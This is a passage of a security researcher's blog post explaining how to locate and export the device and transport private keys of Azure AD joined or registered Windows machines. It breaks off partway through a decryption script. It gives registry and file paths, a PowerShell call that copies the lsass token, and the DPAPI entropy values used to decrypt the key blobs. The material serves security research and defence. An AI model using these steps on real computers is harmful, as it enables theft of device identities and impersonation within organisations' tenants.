<!DOCTYPE html>
<html lang="en-gb">
<head>
<meta charset="UTF-8">
<meta http-equiv="cache-control" content="no-cache"> 
<meta http-equiv="expires" content="0"> 
<meta http-equiv="pragma" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Stealing and faking Azure AD device identities</title>
<meta name="description" content="The site for Microsoft 365 and Azure AD administrators">
<meta name="generator" content="Hugo 0.39" />
<meta property="og:title" content="Stealing and faking Azure AD device identities" />
<meta property="og:description" content="In my previous blog posts I&rsquo;ve covered details on  PRTs, BPRTs, device compliance, and Azure AD device join.

In this blog, I&rsquo;ll show how to steal identities of existing Azure AD joined devices, and how to fake identies of non-AAD joined Windows devices with AADInternals v0.6.6.

" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://o365blog.com/post/deviceidentity/" />



<meta property="article:published_time" content="2022-02-15T00:00:00&#43;00:00"/>

<meta property="article:modified_time" content="2022-02-17T00:00:00&#43;00:00"/>











<link rel="dns-prefetch" href="//fonts.googleapis.com" />
<link rel="dns-prefetch" href="//fonts.gstatic.com" />

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:400,400italic,700" type="text/css" media="all" />
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet">
<link rel="stylesheet" href="/css/style.css" type="text/css" media="all" />
<script type="text/javascript" src="/js/scripts.js"></script>
<script type="text/javascript" src="/js/tools.js"></script>

<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/images/apple-touch-icon-57x57.png" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/images/apple-touch-icon-114x114.png" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/images/apple-touch-icon-72x72.png" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/images/apple-touch-icon-144x144.png" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/images/apple-touch-icon-60x60.png" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/images/apple-touch-icon-120x120.png" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/images/apple-touch-icon-76x76.png" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/images/apple-touch-icon-152x152.png" />
<link rel="icon" type="image/png" href="/images/favicon-196x196.png" sizes="196x196" />
<link rel="icon" type="image/png" href="/images/favicon-96x96.png" sizes="96x96" />
<link rel="icon" type="image/png" href="/images/favicon-32x32.png" sizes="32x32" />
<link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16" />
<link rel="icon" type="image/png" href="/images/favicon-128.png" sizes="128x128" />
<meta name="application-name" content="&nbsp;"/>
<meta name="msapplication-TileColor" content="#FFFFFF" />
<meta name="msapplication-TileImage" content="/images/mstile-144x144.png" />
<meta name="msapplication-square70x70logo" content="/images/mstile-70x70.png" />
<meta name="msapplication-square150x150logo" content="/images/mstile-150x150.png" />
<meta name="msapplication-wide310x150logo" content="/images/mstile-310x150.png" />
<meta name="msapplication-square310x310logo" content="/images/mstile-310x310.png" />


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-61454000-4', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>

</head>
<body class="body body-right-sidebar mobile" itemscope="itemscope" itemtype="http://schema.org/WebPage">
	<div class="container container-outer">
		<header class="header" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
		
			<div class="container container-inner clearfix">
			
				<div class="logo" role="banner" itemscope="itemscope" itemtype="http://schema.org/Brand">
				
					<a class="logo__link" href="/" title="Office 365 blog" rel="home">
						<img src="/images/favicon-96x96.png"><h1 class="logo__title">Office 365 blog</h1>
						<h2 class="logo__tagline">Everything about Microsoft 365 security</h2>
					</a>
				</div>
			</div>
			
<nav class="menu" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<ul class="menu__list">
		<li class="menu__item "><a class="menu__link" href="/aadkillchain/">AAD &amp; M365 KILL CHAIN</a></li>
		<li class="menu__item "><a class="menu__link" href="/aadinternals/">AAD INTERNALS</a></li>
		<li class="menu__item "><a class="menu__link" href="/links/">LINKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/powershell/">POWERSHELL</a></li>
		<li class="menu__item "><a class="menu__link" href="/talks/">TALKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/tools/">TOOLS</a></li>
	</ul>
</nav>

		</header>
		<div class="wrapper clearfix">

<main class="main-content content" role="main" itemprop="mainContentOfPage">
	<article class="post">
		<header class="post__header clearfix">
			<h1 class="post__title">Stealing and faking Azure AD device identities</h1>
			<p class="post__meta meta">
				<svg class="icon icon-time" height="14" viewBox="0 0 16 16" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m8-.0000003c-4.4 0-8 3.6-8 8 0 4.4000003 3.6 8.0000003 8 8.0000003 4.4 0 8-3.6 8-8.0000003 0-4.4-3.6-8-8-8zm0 14.4000003c-3.52 0-6.4-2.88-6.4-6.4000003 0-3.52 2.88-6.4 6.4-6.4 3.52 0 6.4 2.88 6.4 6.4 0 3.5200003-2.88 6.4000003-6.4 6.4000003zm.4-10.4000003h-1.2v4.8l4.16 2.5600003.64-1.04-3.6-2.1600003z"/></svg>
				<time class="post__meta-date" datetime="2022-02-15T00:00:00">February 15, 2022</time>
					<time class="post__meta-lastmod" datetime="2022-02-17T00:00:00"> (Last Modified: February 17, 2022)</time>
				<span class="post__meta-categories meta-categories">
					<svg class="icon icon-category" height="16" viewBox="0 0 16 16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="m7 2l1 2h8v11h-16v-13z"/></svg>
					<a class="meta-categories__link" href="/categories/blog" rel="category">blog</a></span>
			</p>
			<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fdeviceidentity%2f&text=Stealing%20and%20faking%20Azure%20AD%20device%20identities&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fdeviceidentity%2f&mini=true&title=Stealing%20and%20faking%20Azure%20AD%20device%20identities&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
		</header>
		<div class="post__content clearfix">
			<figure class="post__thumbnail">
				<img src="/images/posts/deviceidentity.png" alt="Stealing and faking Azure AD device identities">
			</figure>
				<nav id="TableOfContents">
<ul>
<li><a href="#introduction">Introduction</a></li>
<li><a href="#accessing-the-certificate-and-keys">Accessing the certificate and keys</a>
<ul>
<li><a href="#device-certificate-dkpub-dkpriv">Device Certificate (dkpub / dkpriv)</a></li>
<li><a href="#transport-keys-tkpub-tkpriv">Transport keys (tkpub / tkpriv)</a>
<ul>
<li><a href="#round-1">Round 1</a></li>
<li><a href="#round-2">Round 2</a></li>
</ul></li>
<li><a href="#decrypting-private-keys">Decrypting private keys</a></li>
</ul></li>
<li><a href="#stealing-the-device-identity">Stealing the device identity</a>
<ul>
<li><a href="#device-certificate-and-keys">Device Certificate and keys</a></li>
<li><a href="#transport-keys">Transport keys</a></li>
<li><a href="#detecting">Detecting</a></li>
</ul></li>
<li><a href="#using-the-stolen-device-identity">Using the stolen device identity</a></li>
<li><a href="#faking-device-identity">Faking device identity</a></li>
<li><a href="#summary">Summary</a></li>
<li><a href="#references">References</a></li>
</ul>
</nav>
			<p>In my previous blog posts I&rsquo;ve covered details on <a href="/post/prt" target="_blank"> PRTs</a>, <a href="/post/bprt" target="_blank">BPRTs</a>, <a href="/post/mdm" target="_blank">device compliance</a>, and Azure AD <a href="/post/devices" target="_blank">device join</a>.</p>

<p>In this blog, I&rsquo;ll show how to <strong>steal identities of existing Azure AD joined devices</strong>, and how to <strong>fake identies</strong> of non-AAD joined <strong>Windows devices</strong> with <a href="/aadinternals/" target="_blank">AADInternals</a> <strong>v0.6.6</strong>.</p>

<p></p>

<h1 id="introduction">Introduction</h1>

<p>As described in my earlier <a href="/post/devices#register" target="_blank">blog post</a>, when the device is joined or registered to AAD, two set of keys are created.
These key sets are <strong>Device key (dkpub/dkpriv)</strong> and <strong>Transport key (tkpub/tkpriv)</strong>. Both public keys (dkpub and tkpub) are sent to Azure AD.
Public and private keys are stored in the device, either on disk (encrypted with DPAPI) or in TPM.</p>

<p>Thanks to tools like <a href="https://github.com/gentilkiwi/mimikatz" target="_blank">Mimikatz</a>, I knew that those <strong>keys could be exported from the devices</strong>!</p>

<p>However, this requires two things:</p>

<ul>
<li>The target computer is <strong>NOT using TPM</strong></li>
<li>The attacker has <strong>local admin</strong> permissions to target computer</li>
</ul>

<h1 id="accessing-the-certificate-and-keys">Accessing the certificate and keys</h1>

<p>The first task of the journey was to find out is it really possible to export the keys. To do that, I needed to find the keys!</p>

<p>Luckily, Microsoft have a great <a href="https://docs.microsoft.com/en-us/windows/win32/seccng/key-storage-and-retrieval#key-directories-and-files" target="_blank">document</a> showing the locations of keys.</p>

<p>Microsoft legacy CryptoAPI CSP:</p>

<table>
<thead>
<tr>
<th>Key type</th>
<th>Directories</th>
</tr>
</thead>

<tbody>
<tr>
<td>User private</td>
<td>%APPDATA%\Microsoft\Crypto\RSA\User SID\ <br> %APPDATA%\Microsoft\Crypto\DSS\User SID</td>
</tr>

<tr>
<td>Local system private</td>
<td>%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\S-1-5-18\ <br> %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\S-1-5-18</td>
</tr>

<tr>
<td>Local service private</td>
<td>%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\S-1-5-19\ <br> %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\S-1-5-19</td>
</tr>

<tr>
<td>Network service private</td>
<td>%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\S-1-5-20\ <br> %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\S-1-5-20</td>
</tr>

<tr>
<td>Shared private</td>
<td>%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys <br> %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\DSS\MachineKeys</td>
</tr>
</tbody>
</table>

<p>Microsoft Cryptography Next Generation (CNG):</p>

<table>
<thead>
<tr>
<th>Key type</th>
<th>Directory</th>
</tr>
</thead>

<tbody>
<tr>
<td>User private</td>
<td>%APPDATA%\Microsoft\Crypto\Keys</td>
</tr>

<tr>
<td>Local system private</td>
<td>%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\SystemKeys</td>
</tr>

<tr>
<td>Local service private</td>
<td>%WINDIR%\ServiceProfiles\LocalService</td>
</tr>

<tr>
<td>Network service private</td>
<td>%WINDIR%\ServiceProfiles\NetworkService</td>
</tr>

<tr>
<td>Shared private</td>
<td>%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys</td>
</tr>
</tbody>
</table>

<h2 id="device-certificate-dkpub-dkpriv">Device Certificate (dkpub / dkpriv)</h2>

<p>I already knew that the <strong>Device Certificate</strong> of Azure AD joined computer is located in <strong>Personal</strong> store of <strong>Local Computer</strong>.
The subject of that certificate matches the <strong>Device Id</strong> of that device.</p>

<p><img src="/images/posts/deviceidentity_03.png" alt="procmon dump" /></p>

<p>There are other device related information stored to the certificate in Object Identifiers (OIDs).
The Device Registration (DRS) protocol documentation has a <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dvrj/850786b9-2525-4047-a5ff-8c3093b46b88" target="_blank">list</a> of some of them, but not all, so I had to do some research on those too.</p>

<p>Here is what I found:</p>

<table>
<thead>
<tr>
<th>OID</th>
<th>Value type</th>
<th>Value</th>
</tr>
</thead>

<tbody>
<tr>
<td>1.2.840.113556.1.5.284.2</td>
<td>Guid</td>
<td>DeviceId</td>
</tr>

<tr>
<td>1.2.840.113556.1.5.284.3</td>
<td>Guid</td>
<td>ObjectId</td>
</tr>

<tr>
<td>1.2.840.113556.1.5.284.5</td>
<td>Guid</td>
<td>TenantId</td>
</tr>

<tr>
<td>1.2.840.113556.1.5.284.7</td>
<td>String</td>
<td>Join type:<br>0 = registered <br>1 = joined</td>
</tr>

<tr>
<td>1.2.840.113556.1.5.284.8</td>
<td>String</td>
<td>Tenant region:<br>AF = Africa<br>AS = Asia <br> AP = Australia/Pasific <br> EU = Europe <br>ME = Middle East<br>NA = North America<br>SA = South America</td>
</tr>
</tbody>
</table>

<p>The OID values are DER encoded. The first byte 0x04 means BITSTRING, and the second byte the length of length in bytes (0x80 = LENGTH, 0x01 = one byte, 0x80+0x01=0x81). The third is the length of the data in bytes, and the remaining bytes the actual data.
For instance, the tenant id is just a <a href="https://docs.microsoft.com/en-us/dotnet/api/system.guid.tobytearray#examples" target="_blank">byte array presentation</a> of guid object, where the bytes are grouped differently:</p>

<p><img src="/images/posts/deviceidentity_14.png" alt="OIDs" /></p>

<p>But how does Windows know which certificate to use as a Device Certificate? And where the private key is stored?</p>

<p>Most of you already know that <a href="https://docs.microsoft.com/en-us/azure/active-directory/devices/troubleshoot-device-dsregcmd" target="_blank">dsregcmd</a> <strong>/status</strong> can be used to show details about AAD Joined and AAD Registered devices similar to this (not all information shown):</p>

<div class="highlight"><pre class="chroma"><code class="language-text" data-lang="text"><span class="ln"> 1</span>+----------------------------------------------------------------------+
<span class="ln"> 2</span>| Device State                                                         |
<span class="ln"> 3</span>+----------------------------------------------------------------------+
<span class="ln"> 4</span>
<span class="ln"> 5</span>             AzureAdJoined : YES
<span class="ln"> 6</span>          EnterpriseJoined : NO
<span class="ln"> 7</span>              DomainJoined : NO
<span class="ln"> 8</span>               Device Name : AADJoin02
<span class="ln"> 9</span>
<span class="ln">10</span>+----------------------------------------------------------------------+
<span class="ln">11</span>| Device Details                                                       |
<span class="ln">12</span>+----------------------------------------------------------------------+
<span class="ln">13</span>
<span class="ln">14</span>                  DeviceId : ea77c7d5-7b2f-4567-bf0c-c0a4ceb8b679
<span class="hl"><span class="ln">15</span>                Thumbprint : CEC55C2566633AC8DA3D9E3EAD98A599084D0C4C
</span><span class="ln">16</span> DeviceCertificateValidity : [ 2022-01-28 11:15:49.000 UTC -- 2032-01-28 11:45:49.000 UTC ]
<span class="ln">17</span>            KeyContainerId : 0ad54eab-ba59-4d5b-8ee6-be18fd62b881
<span class="ln">18</span>               KeyProvider : Microsoft Software Key Storage Provider
<span class="ln">19</span>              TpmProtected : NO
<span class="ln">20</span>          DeviceAuthStatus : SUCCESS
<span class="ln">21</span>
<span class="ln">22</span>+----------------------------------------------------------------------+
<span class="ln">23</span>| Tenant Details                                                       |
<span class="ln">24</span>+----------------------------------------------------------------------+
<span class="ln">25</span>
<span class="ln">26</span>                TenantName : Contoso
<span class="hl"><span class="ln">27</span>                  TenantId : c5ff949d-2696-4b68-9e13-055f19ed2d51
</span><span class="ln">28</span>                       Idp : login.windows.net
<span class="ln">29</span>               AuthCodeUrl : https://login.microsoftonline.com/c5ff949d-2696-4b68-9e13-055f19ed2d51/oauth2/authorize
<span class="ln">30</span>            AccessTokenUrl : https://login.microsoftonline.com/c5ff949d-2696-4b68-9e13-055f19ed2d51/oauth2/token
<span class="ln">31</span>                    MdmUrl :
<span class="ln">32</span>                 MdmTouUrl :
<span class="ln">33</span>          MdmComplianceUrl :
<span class="ln">34</span>               SettingsUrl :
<span class="ln">35</span>            JoinSrvVersion : 2.0
<span class="ln">36</span>                JoinSrvUrl : https://enterpriseregistration.windows.net/EnrollmentServer/device/
<span class="ln">37</span>                 JoinSrvId : urn:ms-drs:enterpriseregistration.windows.net
<span class="ln">38</span>             KeySrvVersion : 1.0
<span class="ln">39</span>                 KeySrvUrl : https://enterpriseregistration.windows.net/EnrollmentServer/key/
<span class="ln">40</span>                  KeySrvId : urn:ms-drs:enterpriseregistration.windows.net
<span class="ln">41</span>        WebAuthNSrvVersion : 1.0
<span class="ln">42</span>            WebAuthNSrvUrl : https://enterpriseregistration.windows.net/webauthn/c5ff949d-2696-4b68-9e13-055f19ed2d51/
<span class="ln">43</span>             WebAuthNSrvId : urn:ms-drs:enterpriseregistration.windows.net
<span class="ln">44</span>    DeviceManagementSrvVer : 1.0
<span class="ln">45</span>    DeviceManagementSrvUrl : https://enterpriseregistration.windows.net/manage/c5ff949d-2696-4b68-9e13-055f19ed2d51/
<span class="ln">46</span>     DeviceManagementSrvId : urn:ms-drs:enterpriseregistration.windows.net
<span class="ln">47</span>
<span class="ln">48</span>+----------------------------------------------------------------------+
<span class="ln">49</span>| User State                                                           |
<span class="ln">50</span>+----------------------------------------------------------------------+
<span class="ln">51</span>
<span class="ln">52</span>                    NgcSet : NO
<span class="ln">53</span>           WorkplaceJoined : NO
<span class="ln">54</span>             WamDefaultSet : NO
<span class="ln">55</span>
<span class="ln">56</span>+----------------------------------------------------------------------+
<span class="ln">57</span>| SSO State                                                            |
<span class="ln">58</span>+----------------------------------------------------------------------+
<span class="ln">59</span>
<span class="ln">60</span>                AzureAdPrt : NO
<span class="ln">61</span>       AzureAdPrtAuthority :
<span class="ln">62</span>             EnterprisePrt : NO
<span class="ln">63</span>    EnterprisePrtAuthority :
<span class="ln">64</span>
<span class="ln">65</span>+----------------------------------------------------------------------+
<span class="ln">66</span>| Diagnostic Data                                                      |
<span class="ln">67</span>+----------------------------------------------------------------------+
<span class="ln">68</span>
<span class="ln">69</span>        AadRecoveryEnabled : NO
<span class="ln">70</span>    Executing Account Name : AADJOIN02\PCUser
<span class="hl"><span class="ln">71</span>               KeySignTest : PASSED</span></code></pre></div>

<p>The output shows some interesting things, like thumbprint matching the Device Certificate thumbprint (line 15), tenant id (line 27) and KeySignTest result (line 71). So, time to start up <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon" target="_blank">Process Monitor</a>
to see what happens when the <strong>dsregcmd /status</strong> is executed.</p>

<p>Searching for thubmprint revealed that <strong>desregcmd.exe</strong> was accessing the following registry keys/values:</p>

<p><img src="/images/posts/deviceidentity_01.png" alt="procmon dump" /></p>

<p>This tells us that there is a registry key matching the certificate thumbprint:</p>

<pre><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CloudDomainJoin\JoinInfo\&lt;thumbprint&gt;
</code></pre>

<p>Next, I found another registry key, containing most of the <strong>Tenant details</strong> shown by <strong>dsregcmd</strong>:</p>

<p><img src="/images/posts/deviceidentity_02.png" alt="procmon dump" /></p>

<p>This tells us that there is a registry key matching the tenant id:</p>

<pre><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CloudDomainJoin\TenantInfo\&lt;tenant id&gt;
</code></pre>

<p>While browsing down the procmon output, I found that <strong>lsass.exe</strong> was first reading the Device Certificate and then read a file from <strong>folder that was NOT one of the CNG key stores</strong>:</p>

<p><img src="/images/posts/deviceidentity_04.png" alt="procmon dump" /></p>

<p>So <strong>lsass.exe</strong> must be reading something from the certificate that tells where the key is stored. After some intensive Googling, I found at there is some information about the private key that could be read.
The following PowerShell script dumps the <strong>unique name</strong> of the private key of the Device Certificate.</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Read the certificate</span>
<span class="nv">$certificate</span> <span class="p">=</span> <span class="nb">Get-Item</span> <span class="n">Cert</span><span class="err">:</span><span class="p">\</span><span class="n">LocalMachine</span><span class="p">\</span><span class="n">My</span><span class="p">\</span><span class="n">CEC55C2566633AC8DA3D9E3EAD98A599084D0C4C</span>

<span class="c"># Dump the unique name of private key</span>
<span class="no">[System.Security.Cryptography.X509Certificates.RSACertificateExtensions]</span><span class="p">::</span><span class="n">GetRSAPrivateKey</span><span class="p">(</span><span class="nv">$certificate</span><span class="p">).</span><span class="n">key</span><span class="p">.</span><span class="n">uniquename</span></code></pre></div>

<p>The output shows that the unique matches the key file from above!</p>

<pre><code>8bff0b7f02f6256b521de95a77d4e70d_321154c9-4462-4db7-aa81-81912067ab9a
</code></pre>

<p>This tells us that <strong>dkpub</strong> and <strong>dkpriv</strong> are stored to:</p>

<pre><code>%ALLUSERSPROFILE%\Microsoft\Crypto\Keys\&lt;unique name of dkpriv&gt;
</code></pre>

<p><strong>Note!</strong> For AAD Registered devices, <strong>dkpub</strong> and <strong>dkpriv</strong> are stored to:</p>

<pre><code>%APPDATA%\Microsoft\Crypto\Keys\&lt;unique name of dkpriv&gt;
</code></pre>

<h2 id="transport-keys-tkpub-tkpriv">Transport keys (tkpub / tkpriv)</h2>

<p>Finding the location of <strong>tkpub</strong> and <strong>tkpriv</strong> was way more harder than for <strong>dkpub</strong> and <strong>dkpriv</strong>.</p>

<h3 id="round-1">Round 1</h3>

<p>I searched the procmon output for &ldquo;transportkey&rdquo; and found that <strong>lsass.exe</strong> was accessing the following registry key to read <strong>SoftwareKeyTransportKey</strong>.</p>

<p><img src="/images/posts/deviceidentity_05.png" alt="registry" /></p>

<p>Next I noticed that <strong>lsass.exe</strong> was looping through the files at <strong>SystemKeys</strong> until it seemed to find the correct key file.
<img src="/images/posts/deviceidentity_06.png" alt="procmon output" /></p>

<p>However, the file name did not match anything I had seen in registry. So how did <strong>lsass.exe</strong> know which to choose?
Opening the key file in my favourite hex editor <a href="https://mh-nexus.de/en/hxd/" target="_blank">HxD</a> showed that the key file had
a unicode string matching the <strong>SoftwareKeyTransportKey</strong>!</p>

<p><img src="/images/posts/deviceidentity_07.png" alt="hexdump" /></p>

<p>At this point I thought that I had all I needed and jumped to decrypting the private keys and implemented the functions to <strong>AADInternals</strong>.
However, everything worked only for one tenant ☹</p>

<h3 id="round-2">Round 2</h3>

<p>After doing some further testing, it turned out that the registry paths where the key filename was stored were NOT constants, but they had dependencies on the user (for AAD Registered device) and the tenant.
It took me almost a month to figure out how to &ldquo;calculate&rdquo; the registry keys. And the fact that AAD Joined and AAD Registered were using
different registry keys didn&rsquo;t made it any easier.</p>

<p>So, it was time to bring in the big guns! I started <strong>Process Monitor</strong> and let in ran while I AAD Registered a device. I didn&rsquo;t find anything new though (except totally different registry key name).
However, checking the call stack revealed calls fo <strong>NgcPregenKey</strong> function of <strong>ngcpopkeysrv.dll</strong>.</p>

<p><img src="/images/posts/deviceidentity_08.png" alt="procmon output" /></p>

<p>Next, I fired up my old friend <a href="http://www.rohitab.com/apimonitor" target="_blank">API Monitor</a> and decided to boldly go where no one should ever go: monitor <strong>lsass.exe</strong> during the AAD Register process 😱</p>

<p>I selected all possible APIs, hooked to <strong>lsass.exe</strong> and registered the device to AAD. After that, I detached from the <strong>lsass.exe</strong>. At this point,
Windows announced that it didn&rsquo;t liked that and told me I had one minute to save my work before reboot 🥶</p>

<p>Luckily, I managed to save the API Monitor capture and started to study it.
I searched for the first part of the registry path shown in the procmon dump above (&ldquo;ad8098d0&rdquo;) and got a match!</p>

<p><img src="/images/posts/deviceidentity_09.png" alt="API monitor output" /></p>

<p>Once again a reference to <strong>ngcpopkeysrv.dll</strong>.
With high hopes, I opened the file in <a href="https://github.com/dnSpy/dnSpy" target="_blank">dnSpy</a> but it was not a .NET dll 😒</p>

<p>The last hope was <a href="https://ghidra-sre.org/" target="_blank">Ghidra</a>, which I had just recently installed. After I had it up and running and the dll was loaded,
I started by searching for <strong>CryptBinaryToStringW</strong> and found a match!</p>

<p><img src="/images/posts/deviceidentity_10.png" alt="Ghidra" /></p>

<p>I started to work backwards to find which functions were calling this one.
As Ghidra names all the functions as FUN_xxx (even there is nothing fun about Ghidra!), I renamed functions for something more meaningful, like <strong>xConvertBinaryToString</strong> above.</p>

<p>Finally, I found a location where I saw something hard coded passed to one of the functions:</p>

<p><img src="/images/posts/deviceidentity_11.png" alt="Ghidra" /></p>

<p>So, the string &ldquo;login.live.com&rdquo; was passed as unicode string to a function I renamed to <strong>xConvertValueToHexString</strong>.</p>

<p><img src="/images/posts/deviceidentity_12.png" alt="Ghidra" /></p>

<p>Before calling the function I renamed to <strong>xConvertBinaryToString</strong>, there was a call to <strong>BCryptHash</strong>. It seems that Ghidra messed that call somehow,
as the parameters did not make <a href="https://docs.microsoft.com/en-us/windows/win32/api/bcrypt/nf-bcrypt-bcrypthash" target="_blank">any sense</a>.</p>

<p>As all the registry keys were 64 charactes long, the hash had to be <strong>SHA256</strong>. So, I quickly created a PowerShell script that read
all the values from <strong>JoinInfo</strong> and <strong>TenantInfo</strong>, converted to unicode byte array, and calculated the SHA256 hashes. <strong>Profit !</strong> 💰💰💰</p>

<p>For Azure AD Joined devices, the first key under <strong>PerDeviceKeyTransportKey</strong> is <strong>IdpDomain</strong> from <strong>JoinInfo</strong>. This is always <strong>login.windows.net</strong>.
The second key under that is <strong>TenantId</strong>.</p>

<p>The transport key name of AAD Joined device is located to:</p>

<pre><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\KeyTransportKey\PerDeviceKeyTransportKey\&lt;SHA256(idp)&gt;\&lt;SHA256(tenant id)&gt;
</code></pre>

<p>For Azure AD Registered devices I found out that one part was <strong>UserEmail</strong> from <strong>JoinInfo</strong>. I still had to do some more digging as there was still one part missing. I found the last hint from
the procmon output. There was a call to <strong>memcpy</strong> a couple of lines before call to <strong>CryptBinaryStringW</strong>. For me, it seemed a partial SID.</p>

<p><img src="/images/posts/deviceidentity_13.png" alt="SID" /></p>

<p>After a quick test with PowerShell I could confirm that the missing part was indeed the <strong>SID of the current user</strong>!</p>

<p>The transport key name of AAD Registered device is located to:</p>

<pre><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\KeyTransportKey\&lt;SHA256(sid)&gt;\&lt;SHA256(idp)&gt;\&lt;SHA256(tenant id)&gt;_&lt;SHA256(user email)&gt;
</code></pre>

<h2 id="decrypting-private-keys">Decrypting private keys</h2>

<p>Now that we know the location of the keys, we need to export those.
After debugging what Mimikatz&rsquo;s <strong>crypto::cng</strong> module did, I learned that the files were <a href="https://github.com/gentilkiwi/mimikatz/blob/e10bde5b16b747dc09ca5146f93f2beaf74dd17a/modules/kull_m_key.h#L51" target="_blank">CNG key blobs</a>, containing a set of <strong>dkpub/tkpub</strong> or <strong>dkpriv/tkpriv</strong> keys.</p>

<p>For the <strong>dkpub/tkpub</strong>, there was one property record (Modified) and the actual keys in <a href="https://docs.microsoft.com/en-us/windows/win32/api/bcrypt/ns-bcrypt-bcrypt_rsakey_blob" target="_blank">BCRYPT_RSAKEY_BLOB</a> as <strong>BCRYPT_PUBLIC_KEY_BLOB</strong>.</p>

<p>For the <strong>dkpriv/tkpriv</strong>, there was an encrypted property blob (UI Policy, Device Identity, and Key Usage) and the actual keys in encrypted <strong>BCRYPT_RSAKEY_BLOB</strong> as <strong>BCRYPT_PRIVATE_KEY_BLOB</strong> including the private RSA parameters (<strong>P</strong> and <strong>Q</strong>).</p>

<p>I also learned from the <strong>Mimikatz</strong> that <strong>dkpriv</strong> properties and key blob were both encrypted with our old friend <a href="/post/adsync/" target="_blank">DPAPI</a>!
So, they should be relatively easy to decrypt as I already had implemented functionality to elevate the current process to <strong>lsass</strong> (which is required to get access to system keys) 😊</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="nb">Add-Type</span> <span class="n">-path</span> <span class="s2">&#34;$PSScriptRoot\Win32Ntv.dll&#34;</span>
<span class="no">[AADInternals.Native]</span><span class="p">::</span><span class="n">copyLsassToken</span><span class="p">()</span></code></pre></div>

<p>Again, Benjamin had done a great job by figuring out the entropy needed for both encrypted blobs. After banging my head to the wall over a weekend, I realised that I was just missing the null terminator 🤣</p>

<p>The PowerShell code to decrypt the encrypted blobs:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="nv">$DPAPI_ENTROPY_CNG_KEY_PROPERTIES</span> <span class="p">=</span> <span class="p">@(</span><span class="n">0x36</span><span class="p">,</span><span class="n">0x6A</span><span class="p">,</span><span class="n">0x6E</span><span class="p">,</span><span class="n">0x6B</span><span class="p">,</span><span class="n">0x64</span><span class="p">,</span><span class="n">0x35</span><span class="p">,</span><span class="n">0x4A</span><span class="p">,</span><span class="n">0x33</span><span class="p">,</span><span class="n">0x5A</span><span class="p">,</span><span class="n">0x64</span><span class="p">,</span><span class="n">0x51</span><span class="p">,</span><span class="n">0x44</span><span class="p">,</span><span class="n">0x74</span><span class="p">,</span><span class="n">0x72</span><span class="p">,</span><span class="n">0x73</span><span class="p">,</span><span class="n">0x75</span><span class="p">,</span><span class="n">0x00</span><span class="p">)</span> <span class="c"># &#34;6jnkd5J3ZdQDtrsu&#34; + null terminator </span>
<span class="nv">$DPAPI_ENTROPY_CNG_KEY_BLOB</span>       <span class="p">=</span> <span class="p">@(</span><span class="n">0x78</span><span class="p">,</span><span class="n">0x54</span><span class="p">,</span><span class="n">0x35</span><span class="p">,</span><span class="n">0x72</span><span class="p">,</span><span class="n">0x5A</span><span class="p">,</span><span class="n">0x57</span><span class="p">,</span><span class="n">0x35</span><span class="p">,</span><span class="n">0x71</span><span class="p">,</span><span class="n">0x56</span><span class="p">,</span><span class="n">0x56</span><span class="p">,</span><span class="n">0x62</span><span class="p">,</span><span class="n">0x72</span><span class="p">,</span><span class="n">0x76</span><span class="p">,</span><span class="n">0x70</span><span class="p">,</span><span class="n">0x75</span><span class="p">,</span><span class="n">0x41</span><span class="p">,</span><span class="n">0x00</span><span class="p">)</span> <span class="c"># &#34;xT5rZW5qVVbrvpuA&#34; + null terminator</span>

<span class="c"># Decrypt the private key properties using DPAPI</span>
